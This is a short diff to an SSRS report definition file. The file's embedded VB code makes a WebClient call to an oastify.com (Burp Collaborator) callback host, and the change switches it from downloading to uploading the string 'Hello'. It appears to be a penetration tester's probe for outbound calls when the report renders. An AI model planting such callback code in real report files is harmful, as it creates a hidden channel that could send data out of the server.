--- a/untitled.rdl
+++ b/untitled.rdl
@@ -45,7 +45,7 @@
   </ReportParametersLayout>
   <Code>
     Dim webClient As New System.Net.WebClient
-    Dim result As String = webClient.DownloadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/")
+    Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Hello")
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
